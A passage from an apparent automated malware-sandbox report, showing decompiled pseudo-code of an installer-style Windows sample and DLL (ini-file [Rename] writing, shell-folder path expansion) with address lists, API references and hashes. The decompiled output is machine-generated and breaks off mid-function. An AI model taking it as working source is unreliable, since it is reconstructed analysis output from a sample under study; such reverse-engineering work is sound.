						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405629(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405629(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405675(_t51 + _t29, 0x421c80, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059DD(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056B4(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422608, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                                                          0x00405731
                                                                                                                          0x00405738
                                                                                                                          0x0040573c
                                                                                                                          0x00405745
                                                                                                                          0x00405749
                                                                                                                          0x00405888
                                                                                                                          0x00405888
                                                                                                                          0x00000000
                                                                                                                          0x00405888
                                                                                                                          0x00405749
                                                                                                                          0x00405755
                                                                                                                          0x0040576b
                                                                                                                          0x00405793
                                                                                                                          0x0040579e
                                                                                                                          0x004057a2
                                                                                                                          0x004057c2
                                                                                                                          0x004057c4
                                                                                                                          0x004057c9
                                                                                                                          0x004057d3
                                                                                                                          0x004057e0
                                                                                                                          0x004057e5
                                                                                                                          0x004057ea
                                                                                                                          0x004057ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004057fd
                                                                                                                          0x004057ff
                                                                                                                          0x0040580c
                                                                                                                          0x00405810
                                                                                                                          0x00405881
                                                                                                                          0x00405882
                                                                                                                          0x00000000
                                                                                                                          0x0040582c
                                                                                                                          0x00405839
                                                                                                                          0x0040589e
                                                                                                                          0x004058a5
                                                                                                                          0x0040584c
                                                                                                                          0x0040584c
                                                                                                                          0x0040584e
                                                                                                                          0x00405857
                                                                                                                          0x00405862
                                                                                                                          0x00405874
                                                                                                                          0x0040587b
                                                                                                                          0x00000000
                                                                                                                          0x0040587b
                                                                                                                          0x004058a7
                                                                                                                          0x004058a8
                                                                                                                          0x004058ad
                                                                                                                          0x004058af
                                                                                                                          0x004058bc
                                                                                                                          0x004058bc
                                                                                                                          0x004058c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004058b1
                                                                                                                          0x004058b1
                                                                                                                          0x004058b4
                                                                                                                          0x004058b7
                                                                                                                          0x004058b8
                                                                                                                          0x00000000
                                                                                                                          0x004058b1
                                                                                                                          0x00405844
                                                                                                                          0x00405849
                                                                                                                          0x00000000
                                                                                                                          0x00405849
                                                                                                                          0x00405810
                                                                                                                          0x0040576d
                                                                                                                          0x00405778
                                                                                                                          0x00405781
                                                                                                                          0x00405785
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405785
                                                                                                                          0x00405892

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                            • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                            • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405781
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                                                                          • wsprintfA.USER32 ref: 004057BC
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040587B
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                                                                                                            • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                            • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                          • String ID: %s=%s$[Rename]
                                                                                                                          • API String ID: 3772915668-1727408572
                                                                                                                          • Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                                                                                                          • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                                                                                                          • Opcode Fuzzy Hash: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                                                                                                          • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100025FE, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E100025FE(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t18;
				intOrPtr _t21;
				void* _t23;
				short* _t24;
				void* _t25;
				void* _t30;
				void* _t32;
				void* _t34;
				int _t36;
				void* _t39;
				void* _t42;
				intOrPtr _t52;
				short** _t55;
				void* _t60;
				int _t61;
				int _t62;
				void* _t63;
				short** _t64;
				void* _t65;
				void* _t66;

				_t60 = __edx;
				_t18 = _a4;
				_t52 =  *((intOrPtr*)(_t18 + 0x814));
				_v4 = _t52;
				_t55 = (_t52 + 0x41 << 5) + _t18;
				do {
					if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
						_t64 = _t55;
					} else {
						_t64 =  *_t55;
					}
					_t65 = E10001541();
					_t61 = 0;
					_t21 =  *((intOrPtr*)(_t55 - 8));
					if(_t21 == 0) {
						lstrcpyA(_t65, 0x10004034);
					} else {
						_t30 = _t21 - 1;
						if(_t30 == 0) {
							_push( *_t64);
							goto L12;
						} else {
							_t32 = _t30 - 1;
							if(_t32 == 0) {
								E1000176C(_t60,  *_t64, _t64[1], _t65);
								goto L13;
							} else {
								_t34 = _t32 - 1;
								if(_t34 == 0) {
									_t62 = lstrlenA( *_t64);
									_t36 =  *0x10004058;
									if(_t62 >= _t36) {
										_t62 = _t36 - 1;
									}
									_t7 = _t62 + 1; // 0x1
									lstrcpynA(_t65,  *_t64, _t7);
									 *(_t62 + _t65) =  *(_t62 + _t65) & 0x00000000;
									goto L15;
								} else {
									_t39 = _t34 - 1;
									if(_t39 == 0) {
										WideCharToMultiByte(0, 0,  *_t64,  *0x10004058, _t65,  *0x10004058, 0, 0);
									} else {
										_t42 = _t39 - 1;
										if(_t42 == 0) {
											_t63 = GlobalAlloc(0x40,  *0x10004058 +  *0x10004058);
											_push( *0x10004058 +  *0x10004058);
											_push(_t63);
											_push( *_t64);
											" {*v@u*v"();
											WideCharToMultiByte(0, 0, _t63,  *0x10004058, _t65,  *0x10004058, 0, 0);
											GlobalFree(_t63);
											L15:
											_t61 = 0;
										} else {
											if(_t42 == 1) {
												_push( *_t55);
												L12:
												wsprintfA(_t65, 0x10004008);
												L13:
												_t66 = _t66 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					_t23 = _t55[5];
					if(_t23 != _t61 && ( *_a4 != 2 ||  *((intOrPtr*)(_t55 - 4)) > _t61)) {
						GlobalFree(_t23);
					}
					_t24 = _t55[4];
					if(_t24 != _t61) {
						if(_t24 != 0xffffffff) {
							if(_t24 > _t61) {
								E1000160E(_t24 - 1, _t65);
								goto L32;
							}
						} else {
							E1000159E(_t65);
							L32:
						}
					}
					_t25 = GlobalFree(_t65);
					_v4 = _v4 - 1;
					_t55 = _t55 - 0x20;
				} while (_v4 >= _t61);
				return _t25;
			}
























                                                                                                                          0x100025fe
                                                                                                                          0x100025ff
                                                                                                                          0x10002606
                                                                                                                          0x1000260d
                                                                                                                          0x10002617
                                                                                                                          0x10002619
                                                                                                                          0x1000261d
                                                                                                                          0x10002623
                                                                                                                          0x1000261f
                                                                                                                          0x1000261f
                                                                                                                          0x1000261f
                                                                                                                          0x1000262a
                                                                                                                          0x1000262f
                                                                                                                          0x10002631
                                                                                                                          0x10002633
                                                                                                                          0x1000270c
                                                                                                                          0x10002639
                                                                                                                          0x10002639
                                                                                                                          0x1000263a
                                                                                                                          0x100026ff
                                                                                                                          0x00000000
                                                                                                                          0x10002640
                                                                                                                          0x10002640
                                                                                                                          0x10002641
                                                                                                                          0x100026f5
                                                                                                                          0x00000000
                                                                                                                          0x10002647
                                                                                                                          0x10002647
                                                                                                                          0x10002648
                                                                                                                          0x100026ce
                                                                                                                          0x100026d0
                                                                                                                          0x100026d7
                                                                                                                          0x100026d9
                                                                                                                          0x100026d9
                                                                                                                          0x100026dc
                                                                                                                          0x100026e3
                                                                                                                          0x100026e9
                                                                                                                          0x00000000
                                                                                                                          0x1000264a
                                                                                                                          0x1000264a
                                                                                                                          0x1000264b
                                                                                                                          0x100026be
                                                                                                                          0x1000264d
                                                                                                                          0x1000264d
                                                                                                                          0x1000264e
                                                                                                                          0x1000267d
                                                                                                                          0x10002686
                                                                                                                          0x10002687
                                                                                                                          0x10002688
                                                                                                                          0x1000268a
                                                                                                                          0x1000269f
                                                                                                                          0x100026a6
                                                                                                                          0x100026ac
                                                                                                                          0x100026ac
                                                                                                                          0x10002650
                                                                                                                          0x10002651
                                                                                                                          0x10002657
                                                                                                                          0x10002659
                                                                                                                          0x1000265f
                                                                                                                          0x10002665
                                                                                                                          0x10002665
                                                                                                                          0x10002665
                                                                                                                          0x10002651
                                                                                                                          0x1000264e
                                                                                                                          0x1000264b
                                                                                                                          0x10002648
                                                                                                                          0x10002641
                                                                                                                          0x1000263a
                                                                                                                          0x10002712
                                                                                                                          0x10002717
                                                                                                                          0x10002728
                                                                                                                          0x10002728
                                                                                                                          0x1000272e
                                                                                                                          0x10002733
                                                                                                                          0x10002738
                                                                                                                          0x10002744
                                                                                                                          0x10002749
                                                                                                                          0x00000000
                                                                                                                          0x1000274e
                                                                                                                          0x1000273a
                                                                                                                          0x1000273b
                                                                                                                          0x1000274f
                                                                                                                          0x1000274f
                                                                                                                          0x10002738
                                                                                                                          0x10002751
                                                                                                                          0x10002757
                                                                                                                          0x1000275b
                                                                                                                          0x1000275e
                                                                                                                          0x1000276d

                                                                                                                          APIs
                                                                                                                          • wsprintfA.USER32 ref: 1000265F
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,10001A8A,00000000), ref: 10002677
                                                                                                                          • StringFromGUID2.OLE32(?,00000000,?,?,?,?,00000000,00000001,10001A8A,00000000), ref: 1000268A
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,10001A8A,00000000), ref: 1000269F
                                                                                                                          • GlobalFree.KERNEL32 ref: 100026A6
                                                                                                                            • Part of subcall function 1000160E: lstrcpyA.KERNEL32(-10004047,00000000,?,1000118F,?,00000000), ref: 10001636
                                                                                                                          • GlobalFree.KERNEL32 ref: 10002728
                                                                                                                          • GlobalFree.KERNEL32 ref: 10002751
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                          • String ID: {*v@u*v
                                                                                                                          • API String ID: 2278267121-3183337590
                                                                                                                          • Opcode ID: f2d90fb7604344b88e62606892e29dab83ffb9f5e480ef13eb80547e1e232e8e
                                                                                                                          • Instruction ID: 08b3d8036d164c5881487be7a8a394305a4816547ccba51f0c52e2d45aca7b17
                                                                                                                          • Opcode Fuzzy Hash: f2d90fb7604344b88e62606892e29dab83ffb9f5e480ef13eb80547e1e232e8e
                                                                                                                          • Instruction Fuzzy Hash: 97419D71109555EFF712DF24CC88E2BBBEDFB843C0B124519FA45C616DDB32AC509A21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004059FF, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E004059FF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42365c; // 0x48b9e6
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423eb8; // 0x48a39c
				_t74 = _t73 + _t36;
				_t37 = 0x422e20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e20;
				if(_a4 - 0x422e20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E004059FF(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E004059DD(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E0040593B(_t86,  *0x423e88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405C3F(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f04;
						if( *0x423f04 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423e84; // 0x74691340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423e88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423e88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423eb8;
							E004058C4(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423eb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E004059FF(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E004059DD(_a4, _t37);
			}






























                                                                                                                          0x004059ff
                                                                                                                          0x004059ff
                                                                                                                          0x004059ff
                                                                                                                          0x00405a05
                                                                                                                          0x00405a0a
                                                                                                                          0x00405a0c
                                                                                                                          0x00405a1b
                                                                                                                          0x00405a1b
                                                                                                                          0x00405a1d
                                                                                                                          0x00405a26
                                                                                                                          0x00405a28
                                                                                                                          0x00405a2d
                                                                                                                          0x00405a30
                                                                                                                          0x00405a31
                                                                                                                          0x00405a38
                                                                                                                          0x00405a3a
                                                                                                                          0x00405a40
                                                                                                                          0x00405a43
                                                                                                                          0x00405a43
                                                                                                                          0x00405c1c
                                                                                                                          0x00405c1c
                                                                                                                          0x00405c20
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a50
                                                                                                                          0x00405a56
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a5c
                                                                                                                          0x00405a5d
                                                                                                                          0x00405a60
                                                                                                                          0x00405a63
                                                                                                                          0x00405c0f
                                                                                                                          0x00405c19
                                                                                                                          0x00405c1b
                                                                                                                          0x00405c1b
                                                                                                                          0x00405c11
                                                                                                                          0x00405c13
                                                                                                                          0x00405c15
                                                                                                                          0x00405c16
                                                                                                                          0x00405c16
                                                                                                                          0x00000000
                                                                                                                          0x00405c0f
                                                                                                                          0x00405a69
                                                                                                                          0x00405a6d
                                                                                                                          0x00405a7d
                                                                                                                          0x00405a81
                                                                                                                          0x00405a88
                                                                                                                          0x00405a8b
                                                                                                                          0x00405a8f
                                                                                                                          0x00405a95
                                                                                                                          0x00405a98
                                                                                                                          0x00405a9b
                                                                                                                          0x00405a9e
                                                                                                                          0x00405bb9
                                                                                                                          0x00405bbc
                                                                                                                          0x00405bec
                                                                                                                          0x00405bef
                                                                                                                          0x00405bf4
                                                                                                                          0x00405bf8
                                                                                                                          0x00405bf8
                                                                                                                          0x00405bfd
                                                                                                                          0x00405bfe
                                                                                                                          0x00405c03
                                                                                                                          0x00405c06
                                                                                                                          0x00405c08
                                                                                                                          0x00000000
                                                                                                                          0x00405c08
                                                                                                                          0x00405bbe
                                                                                                                          0x00405bc1
                                                                                                                          0x00405bd6
                                                                                                                          0x00405bdd
                                                                                                                          0x00405bc3
                                                                                                                          0x00405bca
                                                                                                                          0x00405bca
                                                                                                                          0x00405be5
                                                                                                                          0x00405be8
                                                                                                                          0x00405bb1
                                                                                                                          0x00405bb2
                                                                                                                          0x00405bb2
                                                                                                                          0x00000000
                                                                                                                          0x00405be8
                                                                                                                          0x00405aa6
                                                                                                                          0x00405aa7
                                                                                                                          0x00405aad
                                                                                                                          0x00405aaf
                                                                                                                          0x00405ac9
                                                                                                                          0x00405ac9
                                                                                                                          0x00405ad0
                                                                                                                          0x00405ad0
                                                                                                                          0x00405ad7
                                                                                                                          0x00405adb
                                                                                                                          0x00405adb
                                                                                                                          0x00405adc
                                                                                                                          0x00405ade
                                                                                                                          0x00405b17
                                                                                                                          0x00405b1a
                                                                                                                          0x00405b2a
                                                                                                                          0x00405b2d
                                                                                                                          0x00405b35
                                                                                                                          0x00405b3b
                                                                                                                          0x00405b3b
                                                                                                                          0x00405b97
                                                                                                                          0x00405b97
                                                                                                                          0x00405b99
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b3f
                                                                                                                          0x00405b46
                                                                                                                          0x00405b47
                                                                                                                          0x00405b49
                                                                                                                          0x00405b63
                                                                                                                          0x00405b71
                                                                                                                          0x00405b77
                                                                                                                          0x00405b79
                                                                                                                          0x00405b94
                                                                                                                          0x00405b94
                                                                                                                          0x00405b94
                                                                                                                          0x00000000
                                                                                                                          0x00405b94
                                                                                                                          0x00405b7f
                                                                                                                          0x00405b8a
                                                                                                                          0x00405b90
                                                                                                                          0x00405b92
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b92
                                                                                                                          0x00405b4b
                                                                                                                          0x00405b4e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b5d
                                                                                                                          0x00405b5f
                                                                                                                          0x00405b61
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b61
                                                                                                                          0x00000000
                                                                                                                          0x00405b97
                                                                                                                          0x00405b22
                                                                                                                          0x00000000
                                                                                                                          0x00405ae0
                                                                                                                          0x00405ae5
                                                                                                                          0x00405afb
                                                                                                                          0x00405b00
                                                                                                                          0x00405b03
                                                                                                                          0x00405ba0
                                                                                                                          0x00405ba0
                                                                                                                          0x00405ba4
                                                                                                                          0x00405bac
                                                                                                                          0x00405bac
                                                                                                                          0x00000000
                                                                                                                          0x00405ba4
                                                                                                                          0x00405b0d
                                                                                                                          0x00405b9b
                                                                                                                          0x00405b9b
                                                                                                                          0x00405b9e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b9e
                                                                                                                          0x00405ade
                                                                                                                          0x00405ab1
                                                                                                                          0x00405ab5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ab7
                                                                                                                          0x00405abb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405abd
                                                                                                                          0x00405ac1
                                                                                                                          0x00000000
                                                                                                                          0x00405ac3
                                                                                                                          0x00405ac3
                                                                                                                          0x00000000
                                                                                                                          0x00405ac3
                                                                                                                          0x00405ac1
                                                                                                                          0x00405c26
                                                                                                                          0x00405c30
                                                                                                                          0x00405c3c
                                                                                                                          0x00405c3c
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(00000000,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA7
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00405B22
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405B35
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B71
                                                                                                                          • SHGetPathFromIDListA.SHELL32(0040F020,Call), ref: 00405B7F
                                                                                                                          • CoTaskMemFree.OLE32(0040F020), ref: 00405B8A
                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                                                                                                          • lstrlenA.KERNEL32(Call,00000000,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                          • Opcode ID: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                                                                                                          • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                                                                                                          • Opcode Fuzzy Hash: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                                                                                                          • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10002440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E10002440(void* __edx, intOrPtr _a4) {
				signed int _v4;
				CHAR* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t43;
				void** _t49;
				CHAR* _t58;
				void* _t59;
				signed int* _t60;
				void* _t61;
				intOrPtr* _t62;
				CHAR* _t63;
				void* _t73;

				_t59 = __edx;
				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t62 = (_v4 << 5) + _t9;
					_t32 =  *(_t62 + 0x14);
					if(_t32 == 0) {
						goto L9;
					}
					_t58 = 0x1a;
					if(_t32 == _t58) {
						goto L9;
					}
					if(_t32 != 0xffffffff) {
						if(_t32 <= 0 || _t32 > 0x19) {
							 *(_t62 + 0x14) = _t58;
						} else {
							_t32 = E100015E5(_t32 - 1);
							L10:
						}
						goto L11;
					} else {
						_t32 = E10001561();
						L11:
						_t63 = _t32;
